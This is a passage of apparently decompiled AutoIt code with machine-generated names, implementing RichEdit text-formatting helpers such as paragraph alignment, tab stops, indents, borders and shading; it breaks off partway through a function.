- Func Fn014E($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF STRINGLEN($Arg01)<> 2 THEN RETURN SETERROR(0x03FD , 0 , 0 )
- LOCAL $Local00D3 =STRINGLEFT($Arg01, 1 )
- IF NOT ($Local00D3 ="l" OR $Local00D3 ="p" )THEN RETURN SETERROR(0x03FE , 0 , 0 )
- $Local00D3 =STRINGRIGHT($Arg01, 1 )
- IF NOT ($Local00D3 ="d" OR $Local00D3 ="u" )THEN RETURN SETERROR(0x03FF , 0 , 0 )
- LOCAL $Local009F = 0
- SWITCH $Arg01
- CASE "ld"
- $Local009F =$Var04F9
- CASE "lu"
- $Local009F =$Var04FB
- CASE "pd"
- $Local009F =$Var04FD
- CASE "pu"
- $Local009F =$Var04FF
- ENDSWITCH
- LOCAL $Local0055 =Fn0006($Arg00,$Var0564 ,$Local009F , 0 )
- $Local0055 =BITAND($Local0055 ,0xFFFF )
- IF BITAND($Local0055 ,0x8000 )<> 0 THEN $Local0055 =BITOR($Local0055 ,0xFFFF0000 )
- RETURN $Local0055
- ENDFUNC
- Func Fn014F($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
- LOCAL $Local0055 =Fn0006($Arg00,$Var0565 , 0 ,$Arg01)
- IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0150($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var0566 , 0 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn0151($Arg00,$Arg01,$ArgOpt02=FALSE )
- LOCAL CONST $Local00C2 [0x0011 ][ 3 ]=[["bo" ,$Var030E ,$Var0347 ],["di" ,$Var0314 ,$Var0348 ],["em" ,$Var0316 ,$Var0349 ],["hi" ,$Var031A ,$Var034A ],["im" ,$Var031C ,$Var034B ],["it" ,$Var031E ,$Var034C ],["li" ,$Var0324 ,$Var034D ],["ou" ,$Var0328 ,$Var034E ],["pr" ,$Var032A ,$Var034F ],["re" ,$Var032E ,$Var0350 ],["sh" ,$Var0330 ,$Var0351 ],["sm" ,$Var0334 ,$Var0352 ],["st" ,$Var0338 ,$Var0353 ],["sb" ,$Var033C ,$Var0304 ],["sp" ,$Var033D ,$Var0306 ],["un" ,$Var033E ,$Var0354 ],["al" ,$Var0308 ,$Var0344 ]]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- LOCAL $Local00A1 = 0 ,$Local00A2 = 0 ,$Local00CC ,$Local00DD
- FOR $Local00EB = 1 TO STRINGLEN($Arg01)STEP 3
- $Local00DD =STRINGMID($Arg01,$Local00EB + 1 , 2 )
- $Local00CC =- 1
- FOR $Var0558 = 0 TO UBOUND($Local00C2 )- 1
- IF $Local00C2 [$Var0558 ][ 0 ]=$Local00DD THEN
- $Local00CC =$Var0558
- EXITLOOP
- ENDIF
- NEXT
- IF $Local00CC =- 1 THEN RETURN SETERROR(0x03FF ,$Local00DD ,FALSE )
- $Local00A1 =BITOR($Local00A1 ,$Local00C2 [$Local00CC ][ 1 ])
- $Local00DD =STRINGMID($Arg01,$Local00EB , 1 )
- SWITCH $Local00DD
- CASE "+"
- $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][ 2 ])
- CASE "-"
- CASE ELSE
- RETURN SETERROR(0x03FE ,$Local00DD ,FALSE )
- ENDSWITCH
- NEXT
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- DLLSTRUCTSETDATA($Local00A0 , 2 ,$Local00A1 )
- DLLSTRUCTSETDATA($Local00A0 , 3 ,$Local00A2 )
- LOCAL $Local009F =Fn0102($ArgOpt02,BITOR($Var0382 ,$Var0380 ),$Var0380 )
- LOCAL $Local0055 =Fn0006($Arg00,$Var0256 ,$Local009F ,$Local00A0 , 0 ,"wparam" ,"struct*" )
- IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0152($Arg00,$ArgOpt01=DEFAULT )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- IF ISKEYWORD($ArgOpt01)THEN
- DLLSTRUCTSETDATA($Local00A0 , 3 ,$Var0345 )
- $ArgOpt01= 0
- ELSE
- IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- ENDIF
- DLLSTRUCTSETDATA($Local00A0 , 2 ,$Var030C )
- DLLSTRUCTSETDATA($Local00A0 ,0x000C ,$ArgOpt01)
- LOCAL $Local00B1 =Fn013B($Arg00)
- IF $Local00B1 [ 0 ]=$Local00B1 [ 1 ]THEN
- RETURN Fn0006($Arg00,$Var0256 ,$Var0384 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
- ELSE
- RETURN Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
- ENDIF
- ENDFUNC
- Func Fn0153($Arg00,$ArgOpt01=DEFAULT )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- IF ISKEYWORD($ArgOpt01)THEN
- DLLSTRUCTSETDATA($Local00A0 , 3 ,$Var0346 )
- $ArgOpt01= 0
- ELSE
- IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- ENDIF
- DLLSTRUCTSETDATA($Local00A0 , 2 ,$Var0312 )
- DLLSTRUCTSETDATA($Local00A0 , 6 ,$ArgOpt01)
- LOCAL $Local00B1 =Fn013B($Arg00)
- IF $Local00B1 [ 0 ]=$Local00B1 [ 1 ]THEN
- RETURN Fn0006($Arg00,$Var0256 ,$Var0384 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
- ELSE
- RETURN Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )<> 0
- ENDIF
- ENDFUNC
- Func Fn0154($Arg00,$ArgOpt01=DEFAULT )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00D4 =FALSE
- IF ISKEYWORD($ArgOpt01)THEN
- $Local00D4 =TRUE
- $ArgOpt01= 0
- ELSE
- IF BITAND($ArgOpt01,0xFF000000 )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- ENDIF
- Fn0006($Arg00,$Var0254 ,$Local00D4 ,$ArgOpt01)
- RETURN TRUE
- ENDFUNC
- Func Fn0155($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF $Arg01<0xFFFF THEN $Arg01= 0
- Fn0006($Arg00,$Var0202 , 0 ,$Arg01)
- RETURN TRUE
- ENDFUNC
- Func Fn0156($Arg00,$Arg01,$ArgOpt02=TRUE )
- LOCAL CONST $Var0567 = 18.75
- LOCAL $Var0568 ,$Var0569 ="",$Local009F
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF ISSTRING($Arg01)THEN
- IF $Arg01="" THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- LOCAL $Local00D5 =STRINGSPLIT($Arg01,";" )
- LOCAL $Local00D6 =$Local00D5 [ 0 ]
- FOR $Local00EB = 1 TO $Local00D6
- IF NOT Fn0176($Local00D5 [$Local00EB ],">0" )THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- $Var0569 &="int;"
- NEXT
- $Var0569 =STRINGTRIMRIGHT($Var0569 , 1 )
- $Var0568 =DLLSTRUCTCREATE($Var0569 )
- FOR $Local00EB = 1 TO $Local00D6
- DLLSTRUCTSETDATA($Var0568 ,$Local00EB ,$Local00D5 [$Local00EB ]*$Var04B9 /$Var0567 )
- NEXT
- $Local009F =$Local00D6
- ELSEIF ISNUMBER($Arg01)THEN
- IF Fn0176($Arg01,">0" )THEN
- $Var0568 =DLLSTRUCTCREATE("int" )
- DLLSTRUCTSETDATA($Var0568 , 1 ,$Arg01*$Var04B9 /$Var0567 )
- $Local009F = 1
- ELSE
- RETURN SETERROR(0x0400 , 9 ,FALSE )
- ENDIF
- ELSE
- RETURN SETERROR(0x03FD , 0 ,FALSE )
- ENDIF
- LOCAL $Local00D7 =Fn0006($Arg00,$Var056A ,$Local009F ,$Var0568 , 0 ,"wparam" ,"struct*" )<> 0
- IF $ArgOpt02 THEN Fn0080($Arg00)
- RETURN $Local00D7
- ENDFUNC
- Func Fn0157($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">0" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- LOCAL $Var056B ,$Var056C
- SELECT
- CASE NOT ($Arg01=0x0064 OR ($Arg01>=0x00C8 AND $Arg01<0x1900 ))
- RETURN SETERROR(0x03FE , 0 ,FALSE )
- CASE $Arg01>=0x0064
- $Var056B =0x2710
- $Var056C =0x2710 /($Arg01/0x0064 )
- CASE ELSE
- $Var056B =0x2710 *($Arg01/0x0064 )
- $Var056C =0x2710
- ENDSELECT
- RETURN Fn0006($Arg00,$Var0280 ,$Var056B ,$Var056C )<> 0
- ENDFUNC
- Func Fn0158($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- Fn0006($Arg00,$Var025A , 0 ,$Arg01)
- RETURN TRUE
- ENDFUNC
- Func Fn0159($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
- LOCAL $Local00D8 = 0
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">0" ))THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF $ArgOpt02<>DEFAULT THEN
- LOCAL $Local00D5 =STRINGSPLIT($ArgOpt02," " )
- FOR $Local00EB = 1 TO UBOUND($Local00D5 )- 1
- IF NOT STRINGISALPHA($Local00D5 [$Local00EB ])THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- NEXT
- ENDIF
- IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04))THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- IF $ArgOpt01<>DEFAULT THEN
- $Local00D8 =$Var0332
- DLLSTRUCTSETDATA($Local00A0 , 4 ,INT($ArgOpt01*0x0014 ))
- ENDIF
- IF $ArgOpt02<>DEFAULT THEN
- IF STRINGLEN($ArgOpt02)>$Var038C - 1 THEN SETERROR(- 1 , 0 ,FALSE )
- $Local00D8 =BITOR($Local00D8 ,$Var0318 )
- DLLSTRUCTSETDATA($Local00A0 , 9 ,$ArgOpt02)
- ENDIF
- IF $ArgOpt03<>DEFAULT THEN
- $Local00D8 =BITOR($Local00D8 ,$Var0310 )
- DLLSTRUCTSETDATA($Local00A0 , 7 ,$ArgOpt03)
- ENDIF
- IF $ArgOpt04<>DEFAULT THEN
- $Local00D8 =BITOR($Local00D8 ,$Var0322 )
- DLLSTRUCTSETDATA($Local00A0 ,0x000D ,$ArgOpt04)
- ENDIF
- DLLSTRUCTSETDATA($Local00A0 , 2 ,$Local00D8 )
- LOCAL $Local0055 =Fn0006($Arg00,$Var0256 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )
- IF NOT $Local0055 THEN RETURN SETERROR(@ERROR+0x00C8 , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn015A($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT ,$ArgOpt05=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">0" ))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">0" ))THEN RETURN SETERROR(0x2852 , 0 ,FALSE )
- IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03,">0" ))THEN RETURN SETERROR(0x03FF , 0 ,FALSE )
- IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04,">0" ))THEN RETURN SETERROR(0x0400 , 0 ,FALSE )
- IF @NumParams = 1 THEN
- LOCAL $Local002F =CONTROLGETPOs($Arg00,"","")
- $ArgOpt01= 2
- $ArgOpt02= 2
- $ArgOpt03=$Local002F [ 2 ]
- $ArgOpt04=$Local002F [ 3 ]
- Fn015A($Arg00,$ArgOpt01,$ArgOpt02,$ArgOpt03,$ArgOpt04)
- RETURN TRUE
- ELSE
- LOCAL $Local00D5 =Fn012A($Arg00)
- IF $ArgOpt01=DEFAULT THEN
- $ArgOpt01=$Local00D5 [ 0 ]
- ENDIF
- IF $ArgOpt02=DEFAULT THEN
- $ArgOpt02=$Local00D5 [ 1 ]
- ENDIF
- IF $ArgOpt03=DEFAULT THEN
- $ArgOpt03=$Local00D5 [ 2 ]
- ENDIF
- IF $ArgOpt04=DEFAULT THEN
- $ArgOpt04=$Local00D5 [ 3 ]
- ENDIF
- IF $ArgOpt01>=$ArgOpt03 THEN RETURN SETERROR(0x0401 , 0 ,FALSE )
- IF $ArgOpt02>=$ArgOpt04 THEN RETURN SETERROR(0x0402 , 0 ,FALSE )
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- DLLSTRUCTSETDATA($Local0017 ,"Left" ,NUMBER($ArgOpt01))
- DLLSTRUCTSETDATA($Local0017 ,"Top" ,NUMBER($ArgOpt02))
- DLLSTRUCTSETDATA($Local0017 ,"Right" ,NUMBER($ArgOpt03))
- DLLSTRUCTSETDATA($Local0017 ,"Bottom" ,NUMBER($ArgOpt04))
- LOCAL $Local00D9 =Fn0102($ArgOpt05,$Var056D ,$Var056E )
- Fn0006($Arg00,$Local00D9 , 0 ,$Local0017 , 0 ,"wparam" ,"struct*" )
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn015B($Arg00,$ArgOpt01=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- Fn0006($Arg00,$Var056F ,$ArgOpt01)
- RETURN TRUE
- ENDFUNC
- Func Fn015C($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00B5
- SWITCH $Arg01
- CASE "l"
- $Local00B5 =$Var0390
- CASE "c"
- $Local00B5 =$Var0394
- CASE "r"
- $Local00B5 =$Var0392
- CASE "j"
- $Local00B5 =$Var0396
- CASE "w"
- $Local00B5 =$Var0398
- CASE ELSE
- RETURN SETERROR(0x0065 , 0 ,FALSE )
- ENDSWITCH
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 , 2 ,$Var039E )
- DLLSTRUCTSETDATA($Local00B4 , 8 ,$Local00B5 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn015D($Arg00,$Arg01)
- LOCAL ENUM $Var0551 = 0 ,$Var0570 ,$Var0552 ,$Var0553
- LOCAL CONST $Local00C2 [ 9 ][ 4 ]=[["fpg" ,$Var03C0 ,$Var03D0 ,FALSE ],["hyp" ,$Var03C6 ,$Var03D6 ,TRUE ],["kpt" ,$Var03BC ,$Var03CC ,FALSE ],["kpn" ,$Var03BE ,$Var03CE ,FALSE ],["pwo" ,$Var03C4 ,$Var03D4 ,FALSE ],["r2l" ,$Var03BA ,$Var03CA ,FALSE ],["row" ,$Var03B4 ,$Var039A ,FALSE ],["sbs" ,$Var03C8 ,$Var03D8 ,FALSE ],["sln" ,$Var03C2 ,$Var03D2 ,FALSE ]]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF MOD(STRINGLEN($Arg01)+ 1 , 5 )<> 0 THEN RETURN SETERROR(0x03FF , 0 ,FALSE )
- LOCAL $Local00D5 =STRINGSPLIT($Arg01,";" )
- LOCAL $Local00A1 = 0 ,$Local00A2 = 0 ,$Local00DD ,$Local00CC
- FOR $Local00EB = 1 TO UBOUND($Local00D5 , 1 )- 1
- $Local00DD =STRINGMID($Local00D5 [$Local00EB ], 2 )
- $Local00CC =- 1
- FOR $Var0558 = 0 TO UBOUND($Local00C2 , 1 )- 1
- IF $Local00C2 [$Var0558 ][$Var0551 ]=$Local00DD THEN
- $Local00CC =$Var0558
- EXITLOOP
- ENDIF
- NEXT
- IF $Local00CC =- 1 THEN RETURN SETERROR(0x03FE ,$Local00DD ,FALSE )
- $Local00A1 =BITOR($Local00A1 ,$Local00C2 [$Local00CC ][$Var0570 ])
- $Local00DD =STRINGLEFT($Local00D5 [$Local00EB ], 1 )
- SWITCH $Local00DD
- CASE "+"
- IF NOT $Local00C2 [$Local00CC ][$Var0553 ]THEN
- $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][$Var0552 ])
- ENDIF
- CASE "-"
- IF $Local00C2 [$Local00CC ][$Var0553 ]THEN
- $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][$Var0552 ])
- ENDIF
- CASE ELSE
- RETURN SETERROR(0x03FD ,$Local00DD ,FALSE )
- ENDSWITCH
- NEXT
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 , 2 ,$Local00A1 )
- DLLSTRUCTSETDATA($Local00B4 , 4 ,$Local00A2 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn015E($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
- LOCAL $Local00B7
- LOCAL CONST $Var0554 [ 6 ][ 2 ]=[["l" , 1 ],["r" , 2 ],["t" , 4 ],["b" , 8 ],["i" ,0x0010 ],["o" ,0x0020 ]]
- LOCAL CONST $Var0555 [0x000C ]=["none" , .75 , 1.5 , 2.25 , 3 , 4.5 , 6 ,".75d" ,"1.5d" ,"2.25d" ,".75g" ,".75gd" ]
- LOCAL CONST $Var0556 =";blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;aut;"
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt04=DEFAULT OR Fn0176($ArgOpt04,">=0" ))THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
- IF $ArgOpt01="" THEN
- $Local00B7 = 0
- $ArgOpt04= 0
- ELSE
- IF $ArgOpt01=DEFAULT OR $ArgOpt02=DEFAULT OR $ArgOpt03=DEFAULT OR $ArgOpt04=DEFAULT THEN
- LOCAL $Local00D5 =STRINGSPLIT(Fn0133($Arg00),";" )
- IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
- IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
- IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
- IF $ArgOpt04=DEFAULT THEN $ArgOpt04=$Local00D5 [ 4 ]
- ENDIF
- LOCAL $Local00DA = 0 ,$Local00CC ,$Local00DD
- FOR $Local00EB = 1 TO STRINGLEN($ArgOpt01)
- $Local00DD =STRINGMID($ArgOpt01,$Local00EB , 1 )
- $Local00CC =- 1
- FOR $Var0558 = 0 TO UBOUND($Var0554 , 1 )- 1
- IF $Var0554 [$Var0558 ][ 0 ]=$Local00DD THEN
- $Local00CC =$Var0558
- EXITLOOP
- ENDIF
- NEXT
- IF $Local00CC =- 1 THEN RETURN SETERROR(0x0066 ,$Local00DD ,FALSE )
- $Local00DA =BITOR($Local00DA ,$Var0554 [$Local00CC ][ 1 ])
- NEXT
- $Local00CC =- 1
- FOR $Local00EB = 0 TO UBOUND($Var0555 , 1 )- 1
- IF $ArgOpt02=$Var0555 [$Local00EB ]THEN
- $Local00CC =$Local00EB
- EXITLOOP
- ENDIF
- NEXT
- IF $Local00CC =- 1 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- LOCAL $Local00DB =$Local00CC
- $Local00CC =STRINGINSTR($Var0556 ,";" &$ArgOpt03&";" )
- IF $Local00CC = 0 THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- LOCAL $Local00DC =INT($Local00CC / 4 )
- IF $Local00DC =0x0010 THEN
- $Local00DA =BITOR($Local00DA ,0x0040 )
- $Local00DC = 0
- ENDIF
- $Local00B7 =$Local00DA +BITSHIFT($Local00DB ,- 8 )+BITSHIFT($Local00DC ,-0x000C )
- ENDIF
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 ,"wBorderSpace",$ArgOpt04*$Var04B9 )
- DLLSTRUCTSETDATA($Local00B4 ,"wBorders" ,$Local00B7 )
- DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03A6 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn015F($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">=0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- LOCAL $Local00DD =Fn0134($Arg00)
- LOCAL $Local00D5 =STRINGSPLIT($Local00DD ,";" )
- IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
- IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
- IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
- IF $ArgOpt01< 0 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- IF $ArgOpt01+$ArgOpt03< 0 THEN RETURN SETERROR(0x00C8 , 0 ,FALSE )
- IF STRINGINSTR("+-" ,STRINGLEFT($ArgOpt01, 1 ))<> 0 THEN $ArgOpt01=$Local00D5 [ 1 ]+$ArgOpt01
- LOCAL $Local00B8 =$ArgOpt01+$ArgOpt03
- LOCAL $Local00B9 =-$ArgOpt03
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var052D )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 ,"dxStartIndent",$Local00B8 *$Var04B9 )
- DLLSTRUCTSETDATA($Local00B4 ,"dxOffset" ,$Local00B9 *$Var04B9 )
- DLLSTRUCTSETDATA($Local00B4 ,"dxRightIndent",$ArgOpt02*$Var04B9 )
- DLLSTRUCTSETDATA($Local00B4 , 2 ,BITOR($Var03AA ,$Var03AC ,$Var03A8 ))
- LOCAL $Local0055 =Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )
- IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0160($Arg00,$Arg01,$ArgOpt02=DEFAULT ,$ArgOpt03=FALSE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- LOCAL $Var0571 ,$Var0572 ,$Var0573 ,$Var0574 ,$Local00C4
- Fn0178($Arg01,$ArgOpt03,$Var0571 ,$Var0572 ,$Var0573 ,$Var0574 ,$Local00C4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,FALSE )
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- IF BITAND($Var0571 ,$Var039C )THEN DLLSTRUCTSETDATA($Local00B4 , 3 ,$Var0572 )
- IF BITAND($Var0571 ,$Var03A4 )THEN DLLSTRUCTSETDATA($Local00B4 ,0x0013 ,$Var0573 )
- IF BITAND($Var0571 ,$Var03A2 )THEN DLLSTRUCTSETDATA($Local00B4 ,0x0014 ,$Var0574 )
- IF BITAND($Var0571 ,$Var03B2 )THEN
- LOCAL $Var0575
- IF $ArgOpt02=DEFAULT THEN
- LOCAL $Local00C2 =Fn0129($Arg00)
- LOCAL $Local00C3 =$Local00C2 [ 0 ]
- $Var0575 =$Local00C4 *$Local00C3 *0x0014
- ELSE
- $Var0575 =$ArgOpt02*$Var04B9
- ENDIF
- DLLSTRUCTSETDATA($Local00B4 ,0x0015 ,$Var0575 )
- ENDIF
- DLLSTRUCTSETDATA($Local00B4 , 2 ,$Var0571 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn0161($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT ,$ArgOpt04=DEFAULT )
- LOCAL $Local00C6 = 0
- LOCAL CONST $Var0576 =";non;dhz;dvt;ddd;dud;dgr;dtr;lhz;lrt;ldd;lud;lgr;ltr;"
- LOCAL CONST $Var0556 =";blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;"
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt01=DEFAULT OR Fn0176($ArgOpt01,">=0" ))THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- IF $ArgOpt01<>DEFAULT OR $ArgOpt02<>DEFAULT OR $ArgOpt03<>DEFAULT OR $ArgOpt04<>DEFAULT THEN
- LOCAL $Local00D5 =STRINGSPLIT(Fn0136($Arg00),";" )
- IF $ArgOpt01=DEFAULT THEN $ArgOpt01=$Local00D5 [ 1 ]
- IF $ArgOpt02=DEFAULT THEN $ArgOpt02=$Local00D5 [ 2 ]
- IF $ArgOpt03=DEFAULT THEN $ArgOpt03=$Local00D5 [ 3 ]
- IF $ArgOpt04=DEFAULT THEN $ArgOpt04=$Local00D5 [ 4 ]
- ENDIF
- IF $ArgOpt01< 0 OR $ArgOpt01>0x0064 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- LOCAL $Local001C =STRINGINSTR($Var0576 ,";" &$ArgOpt02&";" )
- IF $Local001C = 0 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- LOCAL $Local00C0 =INT($Local001C / 4 )
- LOCAL $Local00DE =BITSHIFT(BITAND($Local00C6 ,0x00F0 ), 4 )
- $Local001C =STRINGINSTR($Var0556 ,";" &$ArgOpt03&";" )
